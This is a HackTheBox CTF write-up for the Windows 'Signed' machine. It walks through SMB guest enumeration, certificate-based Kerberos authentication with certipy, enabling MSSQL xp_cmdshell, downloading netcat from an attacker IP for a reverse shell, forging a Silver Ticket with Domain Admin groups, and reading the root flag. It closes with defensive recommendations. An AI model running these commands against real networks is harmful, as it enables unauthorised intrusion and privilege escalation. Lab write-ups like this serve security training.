Signed

HackTheBox

Medium

Windows

Active Directory Kerberos Silver Ticket MSSQL Certificate

Reconnaissance

🔍 1. Initial Nmap Scan

Started with a comprehensive nmap scan to identify open ports and services:

nmap -sCV -T4 -p- -oN nmap-signed.nmap 10.10.11.55

Key Findings:

Port 53: DNS
Port 88: Kerberos
Port 135, 139, 445: SMB/RPC
Port 389, 636, 3268, 3269: LDAP/LDAPS
Port 1433: MSSQL
Domain: SIGNED.HTB

📋 2. SMB Enumeration

Enumerated SMB shares using netexec:

netexec smb 10.10.11.55 -u 'guest' -p '' --shares

Discovered writable share:

Share: SharedDocs (READ, WRITE)

🔐 3. Certificate Analysis

Found a certificate file on the SMB share and extracted the certificate chain:

smbclient //10.10.11.55/SharedDocs -U guest%
get signedca.crt

Analyzed the certificate to extract user information:

openssl pkcs12 -in signedca.pfx -nokeys -out signedca_cert.pem
openssl pkcs12 -in signedca.pfx -nocerts -nodes -out signedca_key.pem

Certificate Information:

Subject: CN=mssqlsvc
Issuer: CN=signedca
Domain: signed.htb

🎟️ 4. Request TGT using Certificate

Used certipy to authenticate with the certificate and request a TGT:

certipy auth -pfx signedca.pfx -dc-ip 10.10.11.55 -domain signed.htb -username mssqlsvc -ns 10.10.11.55

Obtained Credentials:

Username: mssqlsvc
NT Hash: EF699384C3285C54128A3EE1DDB1A0CC

User </>

🗄️ 5. MSSQL Access

Connected to MSSQL service using the obtained credentials:

mssqlclient.py -k -no-pass -dc-ip 10.10.11.55 SIGNED.HTB/mssqlsvc@DC01.SIGNED.HTB

Connection Details:

Successfully authenticated to SQL Server using Kerberos authentication with encryption required.

⚙️ 6. Enable xp_cmdshell

Enabled xp_cmdshell to execute system commands:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

🔄 7. Reverse Shell Setup

Downloaded netcat to the target machine:

xp_cmdshell "powershell wget -UseBasicParsing http://10.10.14.5:3000/nc.exe -OutFile %temp%/nc.exe"

Started listener on attacking machine:

rlwrap nc -nlvp 4000

Executed reverse shell from MSSQL:

xp_cmdshell %temp%\nc.exe -nv 10.10.14.18 4000 -e cmd.exe

Shell Access: Successfully obtained reverse shell as SIGNED\mssqlsvc

🚩 8. User Flag

Retrieved the user flag from the Desktop:

C:\Users\mssqlsvc\Desktop> type user.txt
[USER FLAG RETRIEVED]

Root </>

🔍 9. SID Enumeration

Retrieved SIDs for privileged groups and the service account to prepare for Silver Ticket attack:

Domain SIDs:

Domain Admins: S-1-5-21-4088429403-1159899800-2753317549-512
Enterprise Admins: S-1-5-21-4088429403-1159899800-2753317549-519
mssqlsvc RID: 1103

🎫 10. Forge Silver Ticket

Created a forged Kerberos Silver Ticket with elevated privileges:

ticketer.py -nthash EF699384C3285C54128A3EE1DDB1A0CC \
  -domain-sid S-1-5-21-4088429403-1159899800-2753317549 \
  -domain SIGNED.HTB \
  -spn MSSQLSvc/DC01.SIGNED.HTB \
  -groups 512,519,1105 \
  -user-id 1103 \
  mssqlsvc

Technique Explanation:

-groups 512,519,1105: Adding Domain Admins (512) and Enterprise Admins (519) membership
-user-id 1103: RID of SIGNED\mssqlsvc
-spn: Target service principal name

Export the ticket for use:

export KRB5CCNAME=mssqlsvc.ccache

🔓 11. Privileged MSSQL Access

Connected to MSSQL with the forged ticket and enabled advanced features:

EXEC sp_configure 'show advanced options', 1; 
RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries', 1; 
RECONFIGURE;

👑 12. Root Flag Retrieval

With elevated privileges, read the root flag directly from the Administrator's desktop:

SELECT * FROM OPENROWSET(
    BULK 'C:\Users\Administrator\Desktop\root.txt', 
    SINGLE_CLOB
) AS x;

BulkColumn
---------------------------------------
b'329df3df42d69adbe23f40b9d063aa60\r\n'

Root Access Achieved: Successfully escalated privileges using forged Silver Ticket and retrieved root flag!

Attack Chain Summary

This writeup demonstrated a classic Active Directory attack chain leveraging certificate-based authentication and Kerberos Silver Ticket forgery:

SMB Guest Access
    → Certificate Discovery
    → Certipy Authentication (TGT Request)
    → NT Hash Extraction
    → MSSQL Kerberos Login
    → xp_cmdshell Execution
    → Reverse Shell as mssqlsvc
    → SID Enumeration
    → Silver Ticket Forgery
    → Privileged MSSQL Access
    → Root Flag Retrieval

Key Techniques Demonstrated

Certificate-Based Authentication: Using PKINIT to request TGT with certificate
Kerberos Silver Ticket: Forging service tickets with elevated privileges
MSSQL Exploitation: Leveraging xp_cmdshell for command execution
Privilege Escalation: Abusing service account with manipulated group memberships
Ad Hoc Queries: Using OPENROWSET for file system access

Tools Used

Nmap: Network reconnaissance and service enumeration
NetExec: SMB enumeration and share discovery
OpenSSL: Certificate analysis and manipulation
Certipy: Certificate-based authentication and TGT requests
mssqlclient.py (Impacket): MSSQL client with Kerberos support
ticketer.py (Impacket): Kerberos ticket forgery
Netcat: Reverse shell establishment

Critical Vulnerabilities Exploited

Exposed Certificate: Certificate file accessible via SMB guest access
Certificate Authentication: Service account certificate usable for domain authentication
xp_cmdshell Enabled: Allows arbitrary command execution through SQL
Service Account Hash: NT hash extracted from certificate authentication
Silver Ticket Attack: Forged service tickets accepted without validation
Excessive Service Privileges: MSSQL service running with high privileges

Defensive Recommendations:

Restrict SMB guest access and properly secure sensitive shares
Implement proper certificate management and access controls
Disable xp_cmdshell unless absolutely necessary
Use Managed Service Accounts (MSA/gMSA) with rotating credentials
Monitor for anomalous Kerberos ticket requests and Silver Ticket indicators
Implement least privilege for service accounts
Enable advanced Kerberos auditing and monitoring
Use Protected Users group for sensitive accounts
Implement PAW (Privileged Access Workstation) for administrative tasks

Back to Home Next Writeup